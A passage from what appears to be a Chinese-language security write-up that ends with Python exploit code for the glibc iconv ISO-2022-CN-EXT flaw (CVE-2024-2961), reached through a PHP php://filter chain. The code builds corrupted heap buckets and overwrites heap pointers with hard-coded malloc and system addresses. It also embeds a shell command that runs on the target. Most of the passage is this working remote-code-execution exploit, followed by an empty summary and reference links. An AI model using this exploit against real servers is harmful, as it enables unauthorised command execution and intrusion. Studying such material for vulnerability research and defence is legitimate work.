compressed_bucket(step3_trailer_chunk)    step4_write_zend_heap = ptr_bucket(        0x200000,        0,        # free_slot        0,        0,        zend_heap_base + 0x168,  # 0x18        0,        0,        0,        0,        0,        0,        0,        0,        0,        0,        0,        0,        0,        zend_heap_base,  # 0x140        0,        0,        0,        0,        0,        0,        0,        0,        0,        0,        0,        0,        0,        size=0x100,    )    step4_write_zend_heap = chunked_chunk(step4_write_zend_heap)    step4_write_zend_heap = chunked_chunk(step4_write_zend_heap)    step4_write_zend_heap = compressed_bucket(step4_write_zend_heap)    mallocAddr = 0x7ffff7568120    systemAddr = 0x7ffff7513d60    reallocAddr = 0x7ffff75687c0    step4_write_custom_heap = ptr_bucket(        mallocAddr, systemAddr, reallocAddr, size=0x18    )    step4_write_custom_heap = chunked_chunk(step4_write_custom_heap)    step4_write_custom_heap = chunked_chunk(step4_write_custom_heap)    step4_write_custom_heap = compressed_bucket(step4_write_custom_heap)    step4_use_custom_heap_and_cmd = b"kill -9 $PPID; ls -alF"    step4_use_custom_heap_and_cmd = step4_use_custom_heap_and_cmd.ljust(0x140, b"\x00")    step4_use_custom_heap_and_cmd = qpe(step4_use_custom_heap_and_cmd)    step4_use_custom_heap_and_cmd = chunked_chunk(step4_use_custom_heap_and_cmd)    step4_use_custom_heap_and_cmd = chunked_chunk(step4_use_custom_heap_and_cmd)    step4_use_custom_heap_and_cmd = compressed_bucket(step4_use_custom_heap_and_cmd)    pages = (        step4_write_zend_heap * 4 +        step4_write_custom_heap +        step4_use_custom_heap_and_cmd +        step1_malloc_step2_free * 3 +        step2_malloc_step3_free * 2 +        step3_trigger_bug    )    resource = compress(pages)    resource = base64.b64encode(resource)    resource = f"data:text/plain;base64,{resource.decode()}"    filters = [        # zlib解压缩        "zlib.inflate",        # 第一步        "dechunk",        "convert.iconv.latin1.latin1",        # 第二步        "dechunk",        "convert.iconv.latin1.latin1",        # 第三步触发漏洞        "dechunk",        "convert.iconv.UTF-8.ISO-2022-CN-EXT",        # 第四步,写入数据然后执行命令        "convert.quoted-printable-decode",        "convert.iconv.latin1.latin1",    ]    filters = "|".join(filters)    path = f"php://filter/read={filters}/resource={resource}"    return path


3  总结




4 参考链接


[1] https://www.ambionics.io/blog/iconv-cve-2024-2961-p1

[2] https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py


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